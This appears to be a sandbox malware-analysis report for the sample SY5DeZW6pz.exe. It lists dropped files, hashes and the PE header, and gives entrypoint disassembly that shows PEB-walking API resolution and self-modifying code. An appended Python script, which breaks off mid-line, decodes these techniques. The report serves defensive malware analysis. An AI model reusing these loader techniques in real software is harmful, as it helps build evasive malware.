                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.1.9.0.4.9.0.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.8.7.9.5.5.0.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.a.6.e.1.b.5.-.4.e.e.a.-.4.d.9.0.-.a.d.5.0.-.e.e.c.8.2.2.e.0.9.f.5.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.c.1.d.e.8.c.-.7.5.d.d.-.4.e.f.4.-.a.8.a.a.-.b.4.a.2.c.6.d.e.8.8.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.Y.5.D.e.Z.W.6.p.z...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.c.-.0.0.0.1.-.0.0.1.f.-.6.f.9.2.-.3.f.6.8.8.2.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.9.3.f.4.3.d.0.7.0.b.8.1.0.3.3.1.7.1.3.e.6.f.6.d.e.3.4.2.3.7.0.0.0.0.f.f.f.f.!.0.0.0.0.7.8.0.6.d.5.1.1.3.2.e.4.0.7.2.8.f.5.8.1.3.7.4.a.9.d.7.2.d.9.7.1.3.b.f.f.2.d.d.0.!.S.Y.5.D.e.Z.W.6.p.z...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0000840288282822
                                  Encrypted:false
                                  SSDEEP:96:IuFM+iZ3KhnQ7afRpXIQcQvc6QcEDMcw3DL+HbHg/5kseugtYsaV9w72SGBDLiwW:HViyHBUZMXoj/xMY/u7sxeS274Itm
                                  MD5:05C927751761258263D02231C1A09155
                                  SHA1:F40B6BE7AE8E366792D048D5AB6FD7C737A4DB6D
                                  SHA-256:6F0676046149D42EAAA00A7A05398DDF88D7FFFAF33F153DB73AFF48A28752D4
                                  SHA-512:A37A0C334FFF3CD632FEF616EFE2D0C429D298DBC954E4AD878F1D2AB01EFD72CF3FCF68CA8C0AE88F55A8748A3B019AD087CFC6E8FFBC8A2873739F1F5C5704
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.6.4.5.5.6.9.9.4.3.8.8.1.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.6.4.5.5.7.0.3.1.8.8.7.8.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.d.3.2.9.f.4.-.3.5.d.5.-.4.1.1.c.-.a.0.b.c.-.c.f.b.a.2.1.3.0.3.0.6.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.2.0.0.0.6.0.-.e.5.e.c.-.4.a.8.f.-.a.5.6.5.-.b.1.2.5.7.8.1.5.1.9.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.S.Q.s.h.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.4.-.0.0.0.1.-.0.0.1.f.-.6.b.d.9.-.f.7.6.8.8.2.b.d.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.3.3.0.4.d.3.c.8.f.7.3.c.d.1.f.a.1.7.6.4.d.4.d.0.9.b.6.d.5.1.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.v.S.Q.s.h.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 14 streams, Wed Aug 31 21:41:32 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):49104
                                  Entropy (8bit):2.019836279961016
                                  Encrypted:false
                                  SSDEEP:384:/Xml5KtemOZb04hXOktM+Ewt+tHrU49Y:q0temOxOkli
                                  MD5:9C7FAD2523F963F71599B42E364605CC
                                  SHA1:09B1CAABA19A1584796F0863519C93AD02AD1DD0
                                  SHA-256:1ED520A43D1D1DE9097238F5A09F90FBB64F1028AC84227A66F947AD76711673
                                  SHA-512:BC3C6CE399ED32967AF5DF81247F9130CDF31FE19961205347C7D5D89D45B2575038DE646676E3BE9C4ED53CB4E138A13F9CBCFB8D6DF83410CD8054CBB718D2
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... ..........c....................................$....,..........T.......8...........T...........P................................................................................................U...........B......\.......GenuineIntelW...........T..............c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed Aug 31 21:41:40 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):168314
                                  Entropy (8bit):1.8045574036023055
                                  Encrypted:false
                                  SSDEEP:768:yMIuLhbf6N3TVHY1Sf+B9xIym3QKCRyV1Qoo:rFbyxBHCzvSD3QE3Qoo
                                  MD5:067CC1DDDB06F6B874D6C06BA3930980
                                  SHA1:F241F0C82B93846000C85C1D87CFE1CBA41C8017
                                  SHA-256:5B6830A566B86B306A1EFB1302BF801148000B45FCCE5F3784521DC7FB51A083
                                  SHA-512:9D2BF317297AD34DE51722E91B33FCD2FE271B288DF5D96734B72B2A48FE6E5E20064A2897BFB0D9AD6ACEFDBE957C1A5C404A366E59268F505C8F79F795A025
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... ..........c........................|...........<...4"...........U..........`.......8...........T............9...W..........p"..........\$...................................................................U...........B.......$......GenuineIntelW...........T..............c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8260
                                  Entropy (8bit):3.6984522366757666
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiK66ag6YmB6vUJgmfASS+prf89bhXsf0kLm:RrlsNi/6d6YY6vUJgmfAS+hcfs
                                  MD5:808700FFDBF2CA592D551781445F4FDD
                                  SHA1:3DEE23C640724E5C024A7DF1589C3E8B0FF59BD1
                                  SHA-256:652D7C76EF7B8829AB9DDF9710AD0BDA839C1D6A82CF61E8C0EBBB3A680F76FE
                                  SHA-512:0EF1C347C67C98154AD517F090B36D7A7FA9071C3AB18CCF88E6D3A4C266C33891C7FE493E9CEB25C98AEED18C884507559F2085652E17473EC6A5E25392020E
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.4.0.<./.P.i.d.>.......
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4535
                                  Entropy (8bit):4.445729489574115
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsZrJgtWI9A2Wgc8sqYjT8fm8M4JA6FJJ+q8i6sgwBd:uITfbbXgrsqYcJdisgwBd
                                  MD5:C23271359A945888EF17E4B4EFC0D4A2
                                  SHA1:B0350C9BEC6B702368289D1EEBBE3DADD9BBF363
                                  SHA-256:997FB19CA6E1EF2D413D37F54E2BDBBB65BBB86D68195D9110EE45C69137CCC9
                                  SHA-512:B8DD1376FD8D5C9EEF43C864647F9D8F7085920DEEE448CA519406F93CE1014386D75A9E0A32B07B5DC5C9EE75325DB4C70E41FC59B5B609411EBDC6538428EC
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8404
                                  Entropy (8bit):3.69901124223282
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNiWX6UcC6YecSUmlDgmfrSS+prt89b0YSOsf7ycm:RrlsNi+6UcC6YFSUSDgmfrSU0Pf7Y
                                  MD5:010A43B46D6D3E57F988C51E7006799D
                                  SHA1:EDF92FB8F9AE7C8B7A74C68D896CB2B82A149311
                                  SHA-256:F8F830CB1C45C8F40F7FC2FA3FE8FE7AD36769A46D2CAF399D5EE82537A6A40C
                                  SHA-512:CCB2A9AD08504A6F1456CD7420E49EB138148FE27F298195CEF418FAC1AF5CC202EF6090473F5388D4837AC857EDE223AE977BAE131C479A18085FE9E828F167
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.0.<./.P.i.d.>.......
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4704
                                  Entropy (8bit):4.492486454457837
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsZrJgtWI9A2Wgc8sqYjI8fm8M4J2AVLzMFz+q8vXVLzNIxkM6Sd:uITfbbXgrsqYhJjziKdzNIxd6Sd
                                  MD5:8F6D08F91C558BE006B16A4916049448
                                  SHA1:41D3EF9F43DDEE34A9E8B65413E53A18A2E4A7FE
                                  SHA-256:14C64315B8ADC742DD26F579E669972BA163B4101462610743A682127D7A5F07
                                  SHA-512:E56B0174BE4608648D74FF1F452EA984CD46177CDF138F65F42B47297D02C84AC8E667E29B75A8275D9209F930E935DB318081262808358DC83A15223C7F5829
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1672252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:modified
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031113762428177
                                  Encrypted:false
                                  SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                  MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                  SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                  SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 76%
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\SY5DeZW6pz.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):46
                                  Entropy (8bit):1.0424600748477153
                                  Encrypted:false
                                  SSDEEP:3:/lbq:4
                                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                  Malicious:false
                                  Preview:........................................user.
                                  Process:C:\Users\user\AppData\Local\Temp\vSQshX.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1572864
                                  Entropy (8bit):4.301794266776387
                                  Encrypted:false
                                  SSDEEP:12288:mEG0Th31T9p6rTSPer9W31vNwBae0NhX21KHHNYmDbrSPV7IRO:ZG0Th31T9pWTSPt/wu
                                  MD5:78B824E44CB084B033F83E6AF4590FCA
                                  SHA1:3D67B3A5F784276B46B107B0CEF7D1AE08F5235B
                                  SHA-256:5B0C710A36AC721E98FA508558F60054B9694FDF18402A3C8CE726541C739656
                                  SHA-512:615503A647EAC5FCF8C7EF4869A5AF9A15E444A3AC64E4BC0CD6684B94043E4E7EADB47E9A657EDDB3892E6A291C6B3ECFB798AC87A621D226B6B26A84919E76
                                  Malicious:false
                                  Preview:regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmR..k.................................................................................................................................................................................................................................................................................................................................................Z.6........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):5.755823427225404
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:SY5DeZW6pz.exe
                                  File size:960512
                                  MD5:536f2c1238ef65a64820c35d4504ce67
                                  SHA1:7806d51132e40728f581374a9d72d9713bff2dd0
                                  SHA256:b6a71449958283718f01e6be9f7a9eb057479072c1cc55f26a11b033ea210271
                                  SHA512:3ca2eb2b1603a3b1d903d3af8ce2e789ab4f22a6ab8300161a33396a98696d246f3652e4923b827124ea64d7773a87647d42f8b1acc9b4030370866a4618d2f5
                                  SSDEEP:24576:bh+6kooooooooooooooooooooooooooooooooooooooooooooooooooQ:cCoooooooooooooooooooooooooooooo
                                  TLSH:08153A59F6864312E684177115C13DC1B23E63BB794AEE4894F893491353E8CE3BB8EE
                                  File Content Preview:MZ......................@...............................................!..L.!This W..K..m cannot be run in DOS mode....$.........Tg..:4..:4..:4...4..:4...4..:4...4..:4..:4..:4...4..:4..;42.:4...4..:4...4..:4...4..:4...4..:4Rich..:4........PE..L.9..Z.Z...
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x10016000
                                  Entrypoint Section:|Zu8
                                  Digitally signed:false
                                  Imagebase:0x10000000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH
                                  Time Stamp:0x5A8C5AD9 [Tue Feb 20 17:28:57 2018 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:6b11af918234585a966ca8fab046dc6c
                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  sub esp, 0000016Ch
                                  xor eax, eax
                                  push ebx
                                  push esi
                                  push edi
                                  mov dword ptr [ebp-24h], eax
                                  mov dword ptr [ebp-10h], eax
                                  mov dword ptr [ebp-14h], eax
                                  mov dword ptr [ebp-08h], eax
                                  mov dword ptr [ebp-0Ch], eax
                                  mov dword ptr [ebp-20h], eax
                                  mov dword ptr [ebp-18h], eax
                                  mov dword ptr [ebp-48h], 73515376h
                                  mov dword ptr [ebp-44h], 652E5868h
                                  mov dword ptr [ebp-40h], 00006578h
                                  mov dword ptr [ebp-3Ch], 00000000h
                                  call 00007F0208BA1085h
                                  pop eax
                                  add eax, 00000225h
                                  mov dword ptr [ebp-04h], eax
                                  mov eax, dword ptr fs:[00000030h]
                                  mov dword ptr [ebp-28h], eax
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax], E904C483h
                                  mov eax, dword ptr [ebp-04h]
                                  mov dword ptr [eax+04h], FFFEE97Fh
                                  mov eax, dword ptr [ebp-28h]
                                  mov eax, dword ptr [eax+0Ch]
                                  mov eax, dword ptr [eax+1Ch]
                                  mov eax, dword ptr [eax]
                                  mov eax, dword ptr [eax+08h]
                                  mov ecx, dword ptr [eax+3Ch]
                                  mov ecx, dword ptr [ecx+eax+78h]
                                  add ecx, eax
                                  mov edi, dword ptr [ecx+1Ch]
                                  mov ebx, dword ptr [ecx+20h]
                                  mov esi, dword ptr [ecx+24h]
                                  mov ecx, dword ptr [ecx+18h]
                                  add esi, eax
                                  add edi, eax
                                  add ebx, eax
                                  xor edx, edx
                                  mov dword ptr [ebp-30h], esi
                                  mov dword ptr [ebp-1Ch], edx
                                  mov dword ptr [ebp-34h], ecx
                                  cmp edx, dword ptr [ebp-34h]
                                  jnc 00007F0208BA11CEh
                                  movzx ecx, word ptr [esi+edx*2]
                                  mov edx, dword ptr [ebx+edx*4]
                                  mov esi, dword ptr [edi+ecx*4]
                                  add edx, eax
                                  mov ecx, dword ptr [edx]
                                  add esi, eax
                                  cmp ecx, 4D746547h
                                  jne 00007F0208BA10D4h
                                  cmp dword ptr [edx+04h], 6C75646Fh
                                  jne 00007F0208BA10CBh
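The immediates in the entrypoint listing above carry more information than the raw mnemonics show. The following Python script is an added example (not part of the Joe Sandbox output) that decodes them: the four dword stores at [ebp-48h]..[ebp-3Ch] build a stack string, the two `cmp` constants are the first eight bytes of the export name the loop searches for, and the two dwords written through [ebp-04h] are machine code the stub writes over its own image. The PEB/LDR/PE offsets are the public 32-bit structure layouts; which module the second list entry names depends on the Windows version, as noted in the comments.

```python
import struct

# Immediates transcribed from the entrypoint listing above (added example,
# not Joe Sandbox output). Offsets are the public 32-bit structure layouts.
STACK_STRING_DWORDS = (0x73515376, 0x652E5868, 0x00006578, 0x00000000)  # mov [ebp-48h]..[ebp-3Ch]
EXPORT_NAME_DWORDS = (0x4D746547, 0x6C75646F)                           # cmp ecx,... / cmp [edx+04h],...
PATCH_DWORDS = (0xE904C483, 0xFFFEE97F)                                 # mov [eax],... / mov [eax+04h],...


def dwords_to_bytes(dwords):
    """x86 stores an imm32 little-endian, so the lowest byte is the first character."""
    return b"".join(struct.pack("<I", d) for d in dwords)


def decode_stack_string(dwords):
    """Rebuild a string assembled from imm32 stores; stop at the first NUL."""
    return dwords_to_bytes(dwords).split(b"\x00", 1)[0].decode("ascii")


def decode_patch(dwords):
    """Decode the 8 bytes the stub writes over its own code at [ebp-04h].

    83 C4 04    add esp, 4
    E9 rel32    jmp rel32   (rel32 is signed and relative to the end of the jmp)
    """
    raw = dwords_to_bytes(dwords)
    if raw[:3] != b"\x83\xc4\x04" or raw[3] != 0xE9:
        raise ValueError("unexpected patch bytes: " + raw.hex())
    rel32 = struct.unpack("<i", raw[4:8])[0]
    return {"bytes": raw.hex(), "insns": ("add esp, 4", "jmp rel32"), "rel32": rel32}


# What each step of the PEB walk in the listing dereferences (32-bit process).
PEB_WALK = (
    ("mov eax, fs:[30h]",      "TEB -> PEB"),
    ("mov eax, [eax+0Ch]",     "PEB.Ldr -> PEB_LDR_DATA"),
    ("mov eax, [eax+1Ch]",     "InInitializationOrderModuleList.Flink (1st module: ntdll.dll)"),
    ("mov eax, [eax]",         "Flink again -> 2nd module (kernel32.dll on XP/Vista, kernelbase.dll from Win7 on)"),
    ("mov eax, [eax+08h]",     "LDR_DATA_TABLE_ENTRY.DllBase (0x18), relative to the InInitOrder link (0x10)"),
    ("mov ecx, [eax+3Ch]",     "IMAGE_DOS_HEADER.e_lfanew"),
    ("mov ecx, [ecx+eax+78h]", "OptionalHeader.DataDirectory[EXPORT].VirtualAddress"),
    ("[ecx+1Ch/20h/24h/18h]",  "AddressOfFunctions / AddressOfNames / AddressOfNameOrdinals / NumberOfNames"),
)


def explain():
    """Summary lines; returned (not only printed) so they can be checked."""
    patch = decode_patch(PATCH_DWORDS)
    lines = [
        "stack string  : %r (same name as the dropped file C:\\Users\\user\\AppData\\Local\\Temp\\vSQshX.exe)"
        % decode_stack_string(STACK_STRING_DWORDS),
        "export prefix : %r (first 8 bytes of the export name searched for, i.e. GetModuleHandle*)"
        % decode_stack_string(EXPORT_NAME_DWORDS),
        "code patch    : %s -> %s, rel32 = %d (self-modifying code; needs a writable+executable section)"
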